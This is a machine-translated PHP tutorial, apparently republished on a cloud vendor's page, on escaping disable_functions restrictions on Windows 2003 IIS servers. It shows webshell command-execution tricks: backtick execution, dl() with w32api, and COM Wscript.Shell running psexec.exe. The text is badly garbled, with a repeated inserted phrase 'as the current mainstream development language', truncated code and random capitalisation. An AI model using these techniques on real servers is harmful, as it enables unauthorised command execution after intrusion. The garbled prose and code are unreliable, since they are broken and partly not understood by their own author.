New ideas for breaking through Windows 2003 PHP Server _php Tutorial

Source: Internet
Author: User
Tags php server
From WIN2000 to win XP, to WIN2003, the increase in server security for MS IIS (Microsoft Web server platform) is obvious. In WIN2000, a normal PHP (as the current mainstream development language) shell can crush it; At win XP, even if safe mode = off, you cannot execute system commands with functions such as system (), but we can also use COM () function to break through; to win 2003, even if IIS (Microsoft Web server platform) and PHP (as the mainstream development language now) is the default installation, you can use System (), COM () may not be able to take it. At this point you have to use some new methods to make breakthroughs.

1, the breakthrough of Disable_functions

In PHP (as the current mainstream development language) more than -4.0.1 of the version, PHP (as the current mainstream development language). INI introduces a function disable_functions, this function is useful, you can use it to prohibit some functions. For example, in PHP (as the current mainstream development language). ini plus disable_functions = passthru exec System Popen Then when executing these functions you will be prompted Warning:system () has been Disabled for security reasons, while the program terminates running. But there is no way to execute a system command. Because PHP (which is now the mainstream development language) uses a lot of Perl features, such as the ability to execute commands with ('), the sample code is as follows:

   $output ";? >

It is said that this is only set to Safe_mode for on to avoid, but the last time I used a foreign server on the time of failure, people are not always so lucky:

2. Application of DL () function

When any of the internal command executions of PHP (which is currently a mainstream development language) is not available, try DL (), which can only be used with safe mode=off because it is disabled in secure mode. With DL () you can call the W32API function directly, but this extension has been moved to the PECL library, and since PHP (as the current mainstream development language) 5.1.0 The following versions are no longer bound. Here are some examples from the manual:

Load this Extension

DL ("PHP (as current mainstream development language) _w32api.dll");

Registering the GetTickCount function from kernel32.dll

W32api_register_function ("Kernel32.dll",

"GetTickCount",

"Long");

Registering the MessageBoxA function from User32.dll

W32api_register_function ("User32.dll",

"MessageBoxA",

"Long");

Get Boot time Information

$ticks = GetTickCount ();

Convert to easy-to-understand text

$secs = Floor ($ticks/1000);

$mins = Floor ($secs/60);

$hours = Floor ($mins/60);

$str = sprintf ("You had been using your computer for:".

"%d Milliseconds, or%d Seconds".

"or%d mins or%d hours%d mins.",

$ticks,

$secs,

$mins,

$hours,

$mins-($hours *60));

Displays a message dialog box with only one OK button and the above boot time text

MessageBoxA (NULL,

$STR,

"Uptime Information",

MB_OK);

?>

Unfortunately I have not understood the DL () and W32API, so I will not give an example, lest mislead the reader.

3. Application of COM and. Net (Windows) functions

COM (Component object model, Component object models) is a software specification developed by Microsoft that is used to develop object-oriented, compiled software components that allow the abstraction of software as a binary component, primarily for use in Windows platforms.

The Windows version of PHP, which is now the mainstream development language, has built-in support for this extension. You can use COM functions without loading any additional extension libraries. It is used in a way similar to the syntax for creating classes in C + + or Java, and passes COM's class masterpieces to constructors. For example, use the "Wscript.Shell" command in PHP (which is now the mainstream development language) to execute system commands:

$cmd = "E:/cert/admin/psexec.exe";

if ($com =new com ("Wscript.Shell")) echo "Yes";

if (! $cmd 1= $com->exec ($cmd))

{

echo "Can not exec ()";

}

if (! $cmd 2= $cmd 1->stdout ())

{

echo "Can not stdout ()";

}

if (! $cmd 3= $cmd 2->readall ())

{

echo "Can not ReadAll ()";

}

echo $cmd 3;

?>

http://www.bkjia.com/PHPjc/508617.html www.bkjia.com true http://www.bkjia.com/PHPjc/508617.html techarticle from WIN2000 to win XP, to WIN2003, the increase in server security for MS IIS (Microsoft Web server platform) is obvious. In WIN2000, an ordinary PHP (as the current mainstream ...

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.